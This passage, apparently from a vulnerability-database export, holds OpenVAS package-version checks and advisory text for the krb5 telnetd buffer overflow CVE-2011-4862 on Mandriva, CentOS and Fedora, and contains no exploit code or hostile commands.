Mandriva the telnetd daemon from the netkit-telnet-server package\n does not have an initscript to start and stop the service, however\n one could rather easily craft an initscript or start the service by\n other means rendering the system vulnerable to this issue.\n\n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"krb5-appl on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-12/msg00027.php\");\n script_id(831517);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-30 09:13:14 +0530 (Fri, 30 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2011:195\");\n script_cve_id(\"CVE-2011-4862\");\n script_name(\"Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\");\n\n script_summary(\"Check for the Version of krb5-appl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"heimdal-daemons\", rpm:\"heimdal-daemons~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel\", rpm:\"heimdal-devel~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel-doc\", rpm:\"heimdal-devel-doc~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftp\", rpm:\"heimdal-ftp~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftpd\", rpm:\"heimdal-ftpd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-libs\", rpm:\"heimdal-libs~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-login\", rpm:\"heimdal-login~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rsh\", rpm:\"heimdal-rsh~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rshd\", rpm:\"heimdal-rshd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-server\", rpm:\"heimdal-server~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnet\", rpm:\"heimdal-telnet~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnetd\", rpm:\"heimdal-telnetd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-workstation\", rpm:\"heimdal-workstation~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet\", rpm:\"netkit-telnet~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet-server\", rpm:\"netkit-telnet-server~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal\", rpm:\"heimdal~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881412", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881412", "type": "openvas", "title": "CentOS Update for krb5-appl-clients CESA-2011:1852 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-appl-clients CESA-2011:1852 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-December/018361.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881412\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:49:01 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1852\");\n script_name(\"CentOS Update for krb5-appl-clients CESA-2011:1852 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-appl-clients'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"krb5-appl-clients on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\n rlogin clients and servers. Kerberos is a network authentication system\n which allows clients and servers to authenticate to each other using\n symmetric encryption and a trusted third-party, the Key Distribution Center\n (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n\n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n\n For users who have installed the krb5-appl-servers package, have\n enabled the krb5 telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n\n All krb5-appl-server users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881380", "type": "openvas", "title": "CentOS Update for krb5-devel CESA-2011:1851 centos4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-devel CESA-2011:1851 centos4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881380\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:55 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1851\");\n script_name(\"CentOS Update for krb5-devel CESA-2011:1851 centos4\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-devel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"krb5-devel on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Kerberos is a network authentication system which allows clients and\n servers to authenticate to each other using symmetric encryption and a\n trusted third- party, the Key Distribution Center (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n\n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n\n For users who have installed the krb5-workstation package, have\n enabled the telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n\n All krb5-workstation users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:58:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "Check for the Version of krb5-appl", "modified": "2017-12-26T00:00:00", "published": "2012-03-19T00:00:00", "id": "OPENVAS:863823", "href": "http://plugins.openvas.org/nasl.php?oid=863823", "type": "openvas", "title": "Fedora Update for krb5-appl FEDORA-2011-17493", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5-appl FEDORA-2011-17493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5-appl on Fedora 16\";\ntag_insight = \"This package contains Kerberos-aware versions of the telnet, ftp, rcp, rsh,\n and rlogin clients and servers. While these have been replaced by tools\n such as OpenSSH in most environments, they remain in use in others.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071640.html\");\n script_id(863823);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:54 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-17493\");\n script_name(\"Fedora Update for krb5-appl FEDORA-2011-17493\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of krb5-appl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.2~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "Check for the Version of krb5-appl-clients", "modified": "2018-01-01T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881412", "href": "http://plugins.openvas.org/nasl.php?oid=881412", "type": "openvas", "title": "CentOS Update for krb5-appl-clients CESA-2011:1852 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-appl-clients CESA-2011:1852 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\n rlogin clients and servers. Kerberos is a network authentication system\n which allows clients and servers to authenticate to each other using\n symmetric encryption and a trusted third-party, the Key Distribution Center\n (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n \n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n \n For users who have installed the krb5-appl-servers package, have\n enabled the krb5 telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n \n All krb5-appl-server users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\";\n\ntag_affected = \"krb5-appl-clients on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-December/018361.html\");\n script_id(881412);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:49:01 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1852\");\n script_name(\"CentOS Update for krb5-appl-clients CESA-2011:1852 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of krb5-appl-clients\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.1~7.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2011-12-30T00:00:00", "id": "OPENVAS:1361412562310831517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831517", "type": "openvas", "title": "Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-12/msg00027.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831517\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-30 09:13:14 +0530 (Fri, 30 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2011:195\");\n script_cve_id(\"CVE-2011-4862\");\n script_name(\"Mandriva Update for krb5-appl MDVSA-2011:195 (krb5-appl)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-appl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1)\");\n script_tag(name:\"affected\", value:\"krb5-appl on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered and corrected in krb5-appl,\n heimdal and netkit-telnet:\n\n An unauthenticated remote attacker can cause a buffer overflow and\n probably execute arbitrary code with the privileges of the telnet\n daemon (CVE-2011-4862).\n\n In Mandriva the telnetd daemon from the netkit-telnet-server package\n does not have an initscript to start and stop the service, however\n one could rather easily craft an initscript or start the service by\n other means rendering the system vulnerable to this issue.\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"heimdal-daemons\", rpm:\"heimdal-daemons~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel\", rpm:\"heimdal-devel~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-devel-doc\", rpm:\"heimdal-devel-doc~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftp\", rpm:\"heimdal-ftp~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-ftpd\", rpm:\"heimdal-ftpd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-libs\", rpm:\"heimdal-libs~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-login\", rpm:\"heimdal-login~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rsh\", rpm:\"heimdal-rsh~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-rshd\", rpm:\"heimdal-rshd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 